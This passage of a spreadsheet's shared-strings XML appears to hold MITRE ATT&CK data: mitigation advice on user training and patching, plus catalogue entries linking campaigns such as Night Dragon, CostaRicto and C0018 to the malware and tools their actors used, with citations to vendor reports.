    <t>relationship--2ffde834-36f9-463d-93c4-77048f020cf9</t>
  </si>
  <si>
    <t>relationship--4d0c0d1b-94a7-4518-b57e-e79212354bbf</t>
  </si>
  <si>
    <t>10 May 2021</t>
  </si>
  <si>
    <t>Train users to look for double extensions in filenames, and in general use training as a way to bring awareness to common phishing and spearphishing techniques and how to raise suspicion for potentially malicious events.</t>
  </si>
  <si>
    <t>relationship--95020349-b1e3-41ad-9fd2-814d36e906c5</t>
  </si>
  <si>
    <t>Train and test users to identify social engineering techniques used to enable financial theft.</t>
  </si>
  <si>
    <t>relationship--90922ab5-2463-4e3a-a23e-13958cce9795</t>
  </si>
  <si>
    <t>Use user training as a way to bring awareness and raise suspicion for potentially malicious events and dialog boxes (ex: Office documents prompting for credentials).</t>
  </si>
  <si>
    <t>relationship--b921aed3-07ce-49b0-8051-48807fa82ea7</t>
  </si>
  <si>
    <t>Train users to be aware of impersonation tricks and how to counter them, for example confirming incoming requests through an independent platform like a phone call or in-person, to reduce risk.</t>
  </si>
  <si>
    <t>relationship--03981d0c-c7d5-4a65-bd8f-1b1a2c1efe2a</t>
  </si>
  <si>
    <t>relationship--e643eb2e-c309-48dc-b105-ffedb4a61247</t>
  </si>
  <si>
    <t>relationship--b6583fd8-89f7-4494-8690-3456391bf193</t>
  </si>
  <si>
    <t>Use user training as a way to bring awareness to common phishing and spearphishing techniques and how to raise suspicion for potentially malicious events.</t>
  </si>
  <si>
    <t>relationship--e49a1c79-5aa0-4d1a-906d-806c5253bd3e</t>
  </si>
  <si>
    <t>Train users to be aware of the existence of malicious images and how to avoid deploying instances and containers from them.</t>
  </si>
  <si>
    <t>relationship--8f76b879-a168-4d87-b9f1-a06706d48e33</t>
  </si>
  <si>
    <t>relationship--df82dc71-a168-4af3-9526-8449400777dc</t>
  </si>
  <si>
    <t xml:space="preserve">Train users not to open email attachments or click unknown links (URLs). Such training fosters more secure habits within your organization and will limit many of the risks.  </t>
  </si>
  <si>
    <t>relationship--2c595799-aebe-40f3-baa1-0e52cacee8b5</t>
  </si>
  <si>
    <t>Remove smart cards when not in use.</t>
  </si>
  <si>
    <t>relationship--96213379-cdf0-4ee0-8f0c-a9c0d5ffca7e</t>
  </si>
  <si>
    <t>Train users to only accept 2FA/MFA requests from login attempts they initiated, to review source location of the login attempt prompting the 2FA/MFA requests, and to report suspicious/unsolicited prompts.</t>
  </si>
  <si>
    <t>relationship--f78baa1d-e84a-4f32-a1a4-67972bdd94ea</t>
  </si>
  <si>
    <t>relationship--85b3d881-a9d2-45ff-a980-95d0bd9a3dd1</t>
  </si>
  <si>
    <t>relationship--7e8ca453-aee5-48c1-a891-f44a742a95ed</t>
  </si>
  <si>
    <t>Ensure that a finite amount of ingress points to a software deployment system exist with restricted access for those required to allow and enable newly deployed software.</t>
  </si>
  <si>
    <t>relationship--f4d1e337-60ba-4e28-89d1-ff206bae1750</t>
  </si>
  <si>
    <t>Users can be trained to identify social engineering techniques and phishing emails.</t>
  </si>
  <si>
    <t>relationship--ee935350-f68f-4bd7-bfca-878ae48a2b97</t>
  </si>
  <si>
    <t>Users can be trained to identify social engineering techniques and spearphishing attempts.</t>
  </si>
  <si>
    <t>relationship--3de6d2ba-842b-4f60-b177-d8082eebbb1e</t>
  </si>
  <si>
    <t>Holding the Shift key while logging in prevents apps from opening automatically.(Citation: Re-Open windows on Mac)</t>
  </si>
  <si>
    <t>relationship--f5499769-be56-4995-b993-0a2bc59a0f08</t>
  </si>
  <si>
    <t>relationship--e51a1670-52b4-4a0e-b123-7b0ddcf30060</t>
  </si>
  <si>
    <t>Develop and publish policies that define acceptable information to be stored in SharePoint repositories.</t>
  </si>
  <si>
    <t>relationship--c8e05047-85f2-4c28-8918-12d6874a45c2</t>
  </si>
  <si>
    <t>Have a strict approval policy for use of deployment systems.</t>
  </si>
  <si>
    <t>relationship--8f4b9d5d-6ad7-4cca-9869-551604450f91</t>
  </si>
  <si>
    <t>Users can be trained to identify social engineering techniques and spearphishing emails.</t>
  </si>
  <si>
    <t>relationship--bfa95fdc-6f4f-48a9-a155-189c81dc9ebd</t>
  </si>
  <si>
    <t>relationship--a581fb2c-604a-4417-b782-cafd76b11c37</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</si>
  <si>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</si>
  <si>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relationship--d4f9d2ab-70d0-4aaf-9c7f-d94fc0818ecb</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</si>
  <si>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</si>
  <si>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relationship--59f80c0d-e8d7-48f6-960a-3d4b593f8b33</t>
  </si>
  <si>
    <t>relationship--756acf5d-6765-4611-b451-f855eefcbb77</t>
  </si>
  <si>
    <t>Users can be trained to identify and report social engineering techniques and spearphishing attempts, while also being suspicious of and verifying the identify of callers.(Citation: CISA Phishing)</t>
  </si>
  <si>
    <t>relationship--72d641a0-126d-4bb2-98de-9f8ec46a8d9d</t>
  </si>
  <si>
    <t>relationship--1c0eac30-db03-47d4-933a-113d8d365f86</t>
  </si>
  <si>
    <t>Users can be trained to identify social engineering techniques and spearphishing messages with malicious links.</t>
  </si>
  <si>
    <t>relationship--11643b79-aef3-4322-ab3c-06f6569a1583</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</si>
  <si>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</si>
  <si>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relationship--9c3d1701-b0ed-4a20-a864-d2681535cfa8</t>
  </si>
  <si>
    <t>Train users to identify aspects of phishing attempts where they're asked to enter credentials into a site that has the incorrect domain for the application they are logging into.</t>
  </si>
  <si>
    <t>relationship--f780f9d8-1baa-41b7-b7a1-acba717df0ab</t>
  </si>
  <si>
    <t>Train users to identify social engineering techniques and spearphishing emails that could be used to deliver malicious documents.</t>
  </si>
  <si>
    <t>relationship--b2dac45d-0bd8-488a-a00d-d54db8d3507c</t>
  </si>
  <si>
    <t>relationship--246e4d06-8646-4f9a-8d7c-1efd98fd11c1</t>
  </si>
  <si>
    <t>relationship--1d1525e6-74f2-447d-ba11-9e9c9c552403</t>
  </si>
  <si>
    <t>relationship--edaeb27a-9226-4805-ae45-87312a2dc013</t>
  </si>
  <si>
    <t>M1016</t>
  </si>
  <si>
    <t>course-of-action--15437c6d-b998-4a36-be41-4ace3d54d266</t>
  </si>
  <si>
    <t>Continuous monitoring of vulnerability sources and the use of automatic and manual code review tools should also be implemented as well.(Citation: OWASP Top 10)</t>
  </si>
  <si>
    <t>relationship--4d76c9e2-bef1-4b2c-8199-a9a454cf1168</t>
  </si>
  <si>
    <t>relationship--f57f7e65-0017-45a2-9abd-db439a64ad45</t>
  </si>
  <si>
    <t>Regularly scan externally facing systems for vulnerabilities and establish procedures to rapidly patch systems when critical vulnerabilities are discovered through scanning and through public disclosure.(Citation: OWASP Top 10)</t>
  </si>
  <si>
    <t>relationship--4c308ec1-f0c6-4444-af7d-ff045204c326</t>
  </si>
  <si>
    <t>Regularly scan the internal network for available services to identify new and potentially vulnerable services.</t>
  </si>
  <si>
    <t>relationship--16fd4ddb-1ce4-4254-a301-8ac762573a77</t>
  </si>
  <si>
    <t>relationship--d5be72df-7267-4524-85fa-a497a0cd8052</t>
  </si>
  <si>
    <t>uses</t>
  </si>
  <si>
    <t>S0089</t>
  </si>
  <si>
    <t>BlackEnergy</t>
  </si>
  <si>
    <t>malware--54cc1d4f-5c53-4f0e-9ef5-11b4998e82e4</t>
  </si>
  <si>
    <t>software</t>
  </si>
  <si>
    <t>(Citation: Booz Allen Hamilton)</t>
  </si>
  <si>
    <t>relationship--c8e78d6f-ac9d-4ad3-ae13-238f1eb4423a</t>
  </si>
  <si>
    <t>S0607</t>
  </si>
  <si>
    <t>KillDisk</t>
  </si>
  <si>
    <t>malware--e221eb77-1502-4129-af1d-fe1ad55e7ec6</t>
  </si>
  <si>
    <t>relationship--1dad5efc-395f-4b92-8f4f-3e987a4d5e57</t>
  </si>
  <si>
    <t>S0604</t>
  </si>
  <si>
    <t>Industroyer</t>
  </si>
  <si>
    <t>malware--e401d4fe-f0c9-44f0-98e6-f93487678808</t>
  </si>
  <si>
    <t>Within the [2016 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0025), [Industroyer](https://attack.mitre.org/software/S0604) was used to target and disrupt the Ukrainian power grid substation components.(Citation: Dragos Crashoverride 2018)(Citation: ESET Industroyer)</t>
  </si>
  <si>
    <t>relationship--57e8711a-9aae-4a22-94d4-f4c8a3a8f141</t>
  </si>
  <si>
    <t>07 April 2023</t>
  </si>
  <si>
    <t>C0010</t>
  </si>
  <si>
    <t>campaign--ab747e62-1bcb-479f-a26b-1cd39d413d81</t>
  </si>
  <si>
    <t>S1042</t>
  </si>
  <si>
    <t>SUGARDUMP</t>
  </si>
  <si>
    <t>malware--9c10cede-c0bb-4c5c-91c0-8baec30abaf6</t>
  </si>
  <si>
    <t>(Citation: Mandiant UNC3890 Aug 2022)</t>
  </si>
  <si>
    <t>relationship--078ceddf-b534-4e33-acf8-8181adb249f2</t>
  </si>
  <si>
    <t>21 September 2022</t>
  </si>
  <si>
    <t>S1049</t>
  </si>
  <si>
    <t>SUGARUSH</t>
  </si>
  <si>
    <t>malware--44e2a842-415b-47f4-8549-83fbdb8a5674</t>
  </si>
  <si>
    <t>relationship--8d918445-6d96-4729-98e7-e01a318647aa</t>
  </si>
  <si>
    <t>04 October 2022</t>
  </si>
  <si>
    <t>S0115</t>
  </si>
  <si>
    <t>Crimson</t>
  </si>
  <si>
    <t>malware--326af1cd-78e7-45b7-a326-125d2f7ef8f2</t>
  </si>
  <si>
    <t>For [C0011](https://attack.mitre.org/campaigns/C0011), [Transparent Tribe](https://attack.mitre.org/groups/G0134) used an updated version of [Crimson](https://attack.mitre.org/software/S0115).(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022)</t>
  </si>
  <si>
    <t>relationship--c8309976-5d6a-4002-8dd8-07e9692c890c</t>
  </si>
  <si>
    <t>C0015</t>
  </si>
  <si>
    <t>campaign--78068e68-4124-4243-b6f4-76e4e5be8a06</t>
  </si>
  <si>
    <t>S0552</t>
  </si>
  <si>
    <t>AdFind</t>
  </si>
  <si>
    <t>tool--f59508a6-3615-47c3-b493-6676e1a39a87</t>
  </si>
  <si>
    <t>(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>relationship--25f63329-0c2e-47cf-ad32-d89ef439f4f7</t>
  </si>
  <si>
    <t>S0534</t>
  </si>
  <si>
    <t>Bazar</t>
  </si>
  <si>
    <t>malware--99fdf3b4-96ef-4ab9-b191-fc683441cad0</t>
  </si>
  <si>
    <t>relationship--e508222c-c080-46bd-940d-2ed392382546</t>
  </si>
  <si>
    <t>S0154</t>
  </si>
  <si>
    <t>Cobalt Strike</t>
  </si>
  <si>
    <t>malware--a7881f21-e978-4fe4-af56-92c9416a2616</t>
  </si>
  <si>
    <t>relationship--2077bc66-a671-4cc3-87cf-9efff8e969dc</t>
  </si>
  <si>
    <t>S0575</t>
  </si>
  <si>
    <t>Conti</t>
  </si>
  <si>
    <t>malware--4dea7d8e-af94-4bfb-afe4-7ff54f59308b</t>
  </si>
  <si>
    <t>relationship--68b29908-fcbc-464a-b9ed-63ef522bfe81</t>
  </si>
  <si>
    <t>S1040</t>
  </si>
  <si>
    <t>Rclone</t>
  </si>
  <si>
    <t>tool--59096109-a1dd-463b-87e7-a8d110fe3a79</t>
  </si>
  <si>
    <t>relationship--931ed644-db21-4c15-a26d-dcbd958aeec8</t>
  </si>
  <si>
    <t>During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) used the DUSTPAN in-memory dropper to drop a [Cobalt Strike](https://attack.mitre.org/software/S0154) BEACON backdoor onto a compromised network.(Citation: Mandiant APT41)</t>
  </si>
  <si>
    <t>relationship--5a7e12f1-a5e2-44bc-a244-c49688a816e7</t>
  </si>
  <si>
    <t>26 January 2023</t>
  </si>
  <si>
    <t>S1052</t>
  </si>
  <si>
    <t>DEADEYE</t>
  </si>
  <si>
    <t>malware--c46eb8e6-bf29-4696-8008-3ddb0b4ca470</t>
  </si>
  <si>
    <t>relationship--68da81e3-44b7-4d06-ab56-b0095e02eba0</t>
  </si>
  <si>
    <t>20 December 2022</t>
  </si>
  <si>
    <t>S1051</t>
  </si>
  <si>
    <t>KEYPLUG</t>
  </si>
  <si>
    <t>malware--6c575670-d14c-4c7f-9b9d-fd1b363e255d</t>
  </si>
  <si>
    <t>relationship--6499cbec-f304-4170-9e6d-d6f89f841219</t>
  </si>
  <si>
    <t>12 December 2022</t>
  </si>
  <si>
    <t>S0002</t>
  </si>
  <si>
    <t>Mimikatz</t>
  </si>
  <si>
    <t>tool--afc079f3-c0ea-4096-b75d-3f05338b7f60</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</si>
  <si>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</si>
  <si>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relationship--80d4d084-46c0-481f-8827-66bfa2a7bbdd</t>
  </si>
  <si>
    <t>13 December 2022</t>
  </si>
  <si>
    <t>S0097</t>
  </si>
  <si>
    <t>Ping</t>
  </si>
  <si>
    <t>tool--b77b563c-34bb-4fb8-86a3-3694338f7b47</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</si>
  <si>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</si>
  <si>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relationship--c73c6a89-90d5-47e0-af58-b5197d4f3594</t>
  </si>
  <si>
    <t>03 January 2023</t>
  </si>
  <si>
    <t>S0105</t>
  </si>
  <si>
    <t>dsquery</t>
  </si>
  <si>
    <t>tool--38952eac-cb1b-4a71-bad2-ee8223a1c8fe</t>
  </si>
  <si>
    <t>During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) used multiple [dsquery](https://attack.mitre.org/software/S0105) commands to enumerate various Active Directory objects within a compromised environment.(Citation: Mandiant APT41)</t>
  </si>
  <si>
    <t>relationship--7230cc17-59e5-4d6a-9ce3-a17b358e2e94</t>
  </si>
  <si>
    <t>19 December 2022</t>
  </si>
  <si>
    <t>C0018</t>
  </si>
  <si>
    <t>campaign--519ee082-8ab6-439b-988f-a8a3f02c8d30</t>
  </si>
  <si>
    <t>S1053</t>
  </si>
  <si>
    <t>AvosLocker</t>
  </si>
  <si>
    <t>malware--0945a1a5-a79a-47c8-9079-10c16cdfcb5d</t>
  </si>
  <si>
    <t>During [C0018](https://attack.mitre.org/campaigns/C0018), the threat actors used [AvosLocker](https://attack.mitre.org/software/S1053) ransomware to encrypt the compromised network.(Citation: Costa AvosLocker May 2022)(Citation: Cisco Talos Avos Jun 2022)</t>
  </si>
  <si>
    <t>relationship--6ccac8cb-9e5f-4031-bf27-4ced4a1672d2</t>
  </si>
  <si>
    <t>17 January 2023</t>
  </si>
  <si>
    <t>15 February 2023</t>
  </si>
  <si>
    <t>(Citation: Cisco Talos Avos Jun 2022)</t>
  </si>
  <si>
    <t>relationship--aea03b1a-38b1-423c-8dc0-442bb4d6c316</t>
  </si>
  <si>
    <t>(Citation: Cisco Talos Avos Jun 2022)(Citation: Costa AvosLocker May 2022)</t>
  </si>
  <si>
    <t>relationship--7a117c20-6bb1-40b7-90c7-f8a01a987921</t>
  </si>
  <si>
    <t>10 February 2023</t>
  </si>
  <si>
    <t>During [C0018](https://attack.mitre.org/campaigns/C0018), the threat actors used a PowerShell script to execute [Ping](https://attack.mitre.org/software/S0097) commands once every minute against a domain controller.(Citation: Costa AvosLocker May 2022)</t>
  </si>
  <si>
    <t>relationship--194b2a3c-ce1f-4326-a26f-fd998c94b947</t>
  </si>
  <si>
    <t>14 February 2023</t>
  </si>
  <si>
    <t>S0633</t>
  </si>
  <si>
    <t>Sliver</t>
  </si>
  <si>
    <t>tool--11f8d7eb-1927-4806-9267-3a11d4d4d6be</t>
  </si>
  <si>
    <t>relationship--044a6e2a-df26-49aa-a485-304740fadd49</t>
  </si>
  <si>
    <t>S0108</t>
  </si>
  <si>
    <t>netsh</t>
  </si>
  <si>
    <t>tool--5a63f900-5e7e-4928-a746-dd4558e1df71</t>
  </si>
  <si>
    <t>During [C0018](https://attack.mitre.org/campaigns/C0018), the threat actors used [netsh](https://attack.mitre.org/software/S0108) on a domain controller to ensure there was no existing firewall or to disable one.(Citation: Costa AvosLocker May 2022)</t>
  </si>
  <si>
    <t>relationship--10e7df4a-c95d-4b85-b044-84649fe3a6d1</t>
  </si>
  <si>
    <t>C0021</t>
  </si>
  <si>
    <t>campaign--712e38c3-a656-426a-9b3b-a6bfb63294c6</t>
  </si>
  <si>
    <t>(Citation: FireEye APT29 Nov 2018)(Citation: Microsoft Unidentified Dec 2018)</t>
  </si>
  <si>
    <t>relationship--ab563a30-370d-4e84-a9e2-187ba7b886b5</t>
  </si>
  <si>
    <t>C0026</t>
  </si>
  <si>
    <t>campaign--c89fa3ff-4773-4daf-8aec-d8f43f10116e</t>
  </si>
  <si>
    <t>S1074</t>
  </si>
  <si>
    <t>ANDROMEDA</t>
  </si>
  <si>
    <t>malware--dcd9548e-df9e-47c2-81f3-bc084289959d</t>
  </si>
  <si>
    <t>During [C0026](https://attack.mitre.org/campaigns/C0026), the threat actors re-registered expired [ANDROMEDA](https://attack.mitre.org/software/S1074) domains to profile past victims for further targeting.(Citation: Mandiant Suspected Turla Campaign February 2023)</t>
  </si>
  <si>
    <t>relationship--36f057c1-6f80-4254-963b-79704bbe6232</t>
  </si>
  <si>
    <t>16 May 2023</t>
  </si>
  <si>
    <t>S0099</t>
  </si>
  <si>
    <t>Arp</t>
  </si>
  <si>
    <t>tool--30489451-5886-4c46-90c9-0dff9adc5252</t>
  </si>
  <si>
    <t>(Citation: Mandiant Suspected Turla Campaign February 2023)</t>
  </si>
  <si>
    <t>relationship--e0a83a2e-f0c5-4d3d-b053-9a56ef9f7b8e</t>
  </si>
  <si>
    <t>S1075</t>
  </si>
  <si>
    <t>KOPILUWAK</t>
  </si>
  <si>
    <t>malware--09fcc02f-f9d4-43fa-8609-5e5e186b7103</t>
  </si>
  <si>
    <t>[KOPILUWAK](https://attack.mitre.org/software/S1075) was used as a first-stage profiling utility for previous victims of [ANDROMEDA](https://attack.mitre.org/software/S1074) during [C0026](https://attack.mitre.org/campaigns/C0026).(Citation: Mandiant Suspected Turla Campaign February 2023)</t>
  </si>
  <si>
    <t>relationship--dc71c59d-1c71-480a-97de-972248489aa4</t>
  </si>
  <si>
    <t>17 May 2023</t>
  </si>
  <si>
    <t>S0039</t>
  </si>
  <si>
    <t>Net</t>
  </si>
  <si>
    <t>tool--03342581-f790-4f03-ba41-e82e67392e23</t>
  </si>
  <si>
    <t>relationship--35646501-5bff-41bb-a50f-c4f3b1d326f9</t>
  </si>
  <si>
    <t>S1076</t>
  </si>
  <si>
    <t>QUIETCANARY</t>
  </si>
  <si>
    <t>malware--93289ecf-4d15-4d6b-a9c3-4ab27e145ef4</t>
  </si>
  <si>
    <t>During [C0026](https://attack.mitre.org/campaigns/C0026), the threat actors used [QUIETCANARY](https://attack.mitre.org/software/S1076) to gather and exfiltrate data.  (Citation: Mandiant Suspected Turla Campaign February 2023)</t>
  </si>
  <si>
    <t>relationship--9b56f86f-656f-4e18-9557-84638de34f10</t>
  </si>
  <si>
    <t>19 May 2023</t>
  </si>
  <si>
    <t>S0104</t>
  </si>
  <si>
    <t>netstat</t>
  </si>
  <si>
    <t>tool--4664b683-f578-434f-919b-1c1aad2a1111</t>
  </si>
  <si>
    <t>relationship--a0bf4e01-2df1-4256-90fe-a504c76c6baf</t>
  </si>
  <si>
    <t>S0357</t>
  </si>
  <si>
    <t>Impacket</t>
  </si>
  <si>
    <t>tool--26c87906-d750-42c5-946c-d4162c73fc7b</t>
  </si>
  <si>
    <t>During [C0027](https://attack.mitre.org/campaigns/C0027), [Scattered Spider](https://attack.mitre.org/groups/G1015) used [Impacket](https://attack.mitre.org/software/S0357) for lateral movement.(Citation: Crowdstrike TELCO BPO Campaign December 2022)</t>
  </si>
  <si>
    <t>relationship--49cc1b92-9460-4cdf-9b68-ebade6122990</t>
  </si>
  <si>
    <t>12 July 2023</t>
  </si>
  <si>
    <t>C0004</t>
  </si>
  <si>
    <t>CostaRicto</t>
  </si>
  <si>
    <t>campaign--f9cc545e-b0ef-4b92-8884-a3a4427609f6</t>
  </si>
  <si>
    <t>S0614</t>
  </si>
  <si>
    <t>CostaBricks</t>
  </si>
  <si>
    <t>malware--5d342981-5194-41e7-b33f-8e91998d7d88</t>
  </si>
  <si>
    <t>During [CostaRicto](https://attack.mitre.org/campaigns/C0004), threat actors used a custom VM-based payload loader named [CostaBricks](https://attack.mitre.org/software/S0614).(Citation: BlackBerry CostaRicto November 2020)</t>
  </si>
  <si>
    <t>relationship--8b5037a6-8899-4180-bcb3-fbcfbd83f3e1</t>
  </si>
  <si>
    <t>15 September 2022</t>
  </si>
  <si>
    <t>S0613</t>
  </si>
  <si>
    <t>PS1</t>
  </si>
  <si>
    <t>malware--13183cdf-280b-46be-913a-5c6df47831e7</t>
  </si>
  <si>
    <t>During [CostaRicto](https://attack.mitre.org/campaigns/C0004), threat actors used the 64-bit backdoor loader [PS1](https://attack.mitre.org/software/S0613).(Citation: BlackBerry CostaRicto November 2020)</t>
  </si>
  <si>
    <t>relationship--c6c88847-a34c-4e02-a3ab-93daa68744fd</t>
  </si>
  <si>
    <t>S0194</t>
  </si>
  <si>
    <t>PowerSploit</t>
  </si>
  <si>
    <t>tool--13cd9151-83b7-410d-9f98-25d0f0d1d80d</t>
  </si>
  <si>
    <t>During [CostaRicto](https://attack.mitre.org/campaigns/C0004), threat actors used [PowerSploit](https://attack.mitre.org/software/S0194)'s `Invoke-ReflectivePEInjection` module.(Citation: BlackBerry CostaRicto November 2020)</t>
  </si>
  <si>
    <t>relationship--01bd79bd-651b-46f4-8a2e-dbbedd76f213</t>
  </si>
  <si>
    <t>S0029</t>
  </si>
  <si>
    <t>PsExec</t>
  </si>
  <si>
    <t>tool--ff6caf67-ea1f-4895-b80e-4bb0fc31c6db</t>
  </si>
  <si>
    <t>During [CostaRicto](https://attack.mitre.org/campaigns/C0004), threat actors used [PsExec](https://attack.mitre.org/software/S0029).(Citation: BlackBerry CostaRicto November 2020)</t>
  </si>
  <si>
    <t>relationship--7edbf524-1324-4c2b-b3ea-8bc1007943c4</t>
  </si>
  <si>
    <t>S0615</t>
  </si>
  <si>
    <t>SombRAT</t>
  </si>
  <si>
    <t>malware--425771c5-48b4-4ecd-9f95-74ed3fc9da59</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</si>
  <si>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</si>
  <si>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relationship--699be82f-c548-4e2b-a33c-f91ceed1bf9f</t>
  </si>
  <si>
    <t>S0183</t>
  </si>
  <si>
    <t>Tor</t>
  </si>
  <si>
    <t>tool--ed7d0cb1-87a6-43b4-9f46-ef1bc56d6c68</t>
  </si>
  <si>
    <t>During [CostaRicto](https://attack.mitre.org/campaigns/C0004), threat actors used C2 servers managed through [Tor](https://attack.mitre.org/software/S0183).(Citation: BlackBerry CostaRicto November 2020)</t>
  </si>
  <si>
    <t>relationship--685557c9-181e-4702-8866-40ddc524c118</t>
  </si>
  <si>
    <t>C0001</t>
  </si>
  <si>
    <t>Frankenstein</t>
  </si>
  <si>
    <t>campaign--26d9ebae-de59-427f-ae9a-349456bae4b1</t>
  </si>
  <si>
    <t>S0363</t>
  </si>
  <si>
    <t>Empire</t>
  </si>
  <si>
    <t>tool--3433a9e8-1c47-4320-b9bf-ed449061d1c3</t>
  </si>
  <si>
    <t>During [Frankenstein](https://attack.mitre.org/campaigns/C0001) the threat actors used [Empire](https://attack.mitre.org/software/S0363) for discovery.(Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
    <t>relationship--2cf01fbd-c940-4152-8173-bae63f37aedd</t>
  </si>
  <si>
    <t>07 September 2022</t>
  </si>
  <si>
    <t>C0007</t>
  </si>
  <si>
    <t>FunnyDream</t>
  </si>
  <si>
    <t>campaign--8d2bc130-89fe-466e-a4f9-6bce6129c2b8</t>
  </si>
  <si>
    <t>S1041</t>
  </si>
  <si>
    <t>Chinoxy</t>
  </si>
  <si>
    <t>malware--0b639373-5f03-430e-b8f9-2fe8c8faad8e</t>
  </si>
  <si>
    <t>During [FunnyDream](https://attack.mitre.org/campaigns/C0007), [Chinoxy](https://attack.mitre.org/software/S1041) was used to gain persistence and deploy other malware components.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--cf92a7c7-f14e-41f2-82dd-0d9544a125d3</t>
  </si>
  <si>
    <t>10 October 2022</t>
  </si>
  <si>
    <t>S1044</t>
  </si>
  <si>
    <t>malware--be25c1c0-1590-4219-a3d5-6f31799d1d1b</t>
  </si>
  <si>
    <t>During the [FunnyDream](https://attack.mitre.org/campaigns/C0007) campaign, the [FunnyDream](https://attack.mitre.org/software/S1044) backdoor was used to execute multiple components and exfiltrate files.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--021b1f3f-a542-4ff7-a3b5-c9207c58b887</t>
  </si>
  <si>
    <t>23 September 2022</t>
  </si>
  <si>
    <t>S1050</t>
  </si>
  <si>
    <t>PcShare</t>
  </si>
  <si>
    <t>tool--3a53b207-aba2-4a2b-9cdb-273d633669e7</t>
  </si>
  <si>
    <t>During [FunnyDream](https://attack.mitre.org/campaigns/C0007) the threat actors used a customized version of [PcShare](https://attack.mitre.org/software/S1050).(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--f70c842c-f0f4-4b34-afee-87b0fad29cca</t>
  </si>
  <si>
    <t>13 October 2022</t>
  </si>
  <si>
    <t>S0096</t>
  </si>
  <si>
    <t>Systeminfo</t>
  </si>
  <si>
    <t>tool--7fcbc4e8-1989-441f-9ac5-e7b6ff5806f1</t>
  </si>
  <si>
    <t>(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--6aeb6489-91f4-458c-b7f1-15b4025ee3fa</t>
  </si>
  <si>
    <t>S0057</t>
  </si>
  <si>
    <t>Tasklist</t>
  </si>
  <si>
    <t>tool--2e45723a-31da-4a7e-aaa6-e01998a6788f</t>
  </si>
  <si>
    <t>relationship--a77f2c84-7538-48f5-8809-df2fa47ab6df</t>
  </si>
  <si>
    <t>S1043</t>
  </si>
  <si>
    <t>ccf32</t>
  </si>
  <si>
    <t>malware--a394448a-4576-41b8-81cc-9b61abad94ab</t>
  </si>
  <si>
    <t>During [FunnyDream](https://attack.mitre.org/campaigns/C0007), [ccf32](https://attack.mitre.org/software/S1043) was used to collect data.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--0078d802-53f2-4ee4-b802-492e9f121cbe</t>
  </si>
  <si>
    <t>S0100</t>
  </si>
  <si>
    <t>ipconfig</t>
  </si>
  <si>
    <t>tool--294e2560-bd48-44b2-9da2-833b5588ad11</t>
  </si>
  <si>
    <t>relationship--776e6d33-8d3d-42bc-bee2-770d8399dfc4</t>
  </si>
  <si>
    <t>relationship--ce903557-bfa5-4796-be0a-9211f08da2e7</t>
  </si>
  <si>
    <t>C0002</t>
  </si>
  <si>
    <t>Night Dragon</t>
  </si>
  <si>
    <t>campaign--ae407e32-87e0-4d92-8705-3ae25d504d8a</t>
  </si>
  <si>
    <t>S0073</t>
  </si>
  <si>
    <t>ASPXSpy</t>
  </si>
  <si>
    <t>malware--56f46b17-8cfa-46c0-b501-dd52fef394e2</t>
  </si>
  <si>
    <t>During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors deployed [ASPXSpy](https://attack.mitre.org/software/S0073) on compromised web servers.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>relationship--152e1225-7b28-4954-85f1-ebd4300b6ab6</t>
  </si>
  <si>
    <t>08 September 2022</t>
  </si>
  <si>
    <t>During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors used [PsExec](https://attack.mitre.org/software/S0029) to remotely execute droppers.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>relationship--b532ff8b-5bb2-4f62-9d4c-373ec92cfca0</t>
  </si>
  <si>
    <t>S0110</t>
  </si>
  <si>
    <t>at</t>
  </si>
  <si>
    <t>tool--0c8465c0-d0b4-4670-992e-4eee8d7ff952</t>
  </si>
  <si>
    <t>During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors used [at](https://attack.mitre.org/software/S0110) to execute droppers.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>relationship--a4d7be79-1cb7-4009-84d0-165cb6c7fcc6</t>
  </si>
  <si>
    <t>S0008</t>
  </si>
  <si>
    <t>gsecdump</t>
  </si>
  <si>
    <t>tool--b07c2c47-fefb-4d7c-a69e-6a3296171f54</t>
  </si>
  <si>
    <t>During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors used [gsecdump](https://attack.mitre.org/software/S0008) to dump account hashes.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>relationship--09d53bfd-3a67-48f3-acba-385950defb50</t>
  </si>
  <si>
    <t>S0350</t>
  </si>
  <si>
    <t>zwShell</t>
  </si>
  <si>
    <t>malware--54e8672d-5338-4ad1-954a-a7c986bee530</t>
  </si>
  <si>
    <t>During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors used [zwShell](https://attack.mitre.org/software/S0350) to generate Trojan variants, control victim machines, and exfiltrate data.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>relationship--19be7e10-9dab-45d1-acf4-acba7dfb6d10</t>
  </si>
  <si>
    <t>C0012</t>
  </si>
  <si>
    <t>Operation CuckooBees</t>
  </si>
  <si>
    <t>campaign--93c23946-49af-41f4-ac03-40f9ffc7419b</t>
  </si>
  <si>
    <t>(Citation: Cybereason OperationCuckooBees May 2022)</t>
  </si>
  <si>
    <t>relationship--913d20d5-aea1-49bc-826a-90b8697d691d</t>
  </si>
  <si>
    <t>relationship--0c994481-fe49-4961-8b21-2864e391c85e</t>
  </si>
  <si>
    <t>S0694</t>
  </si>
  <si>
    <t>DRATzarus</t>
  </si>
  <si>
    <t>malware--56aa3c82-ed40-4b5a-84bf-7231356d9e96</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</si>
  <si>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</si>
  <si>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relationship--ef2cc201-0b82-41a9-98fd-1eda4fb79b39</t>
  </si>
  <si>
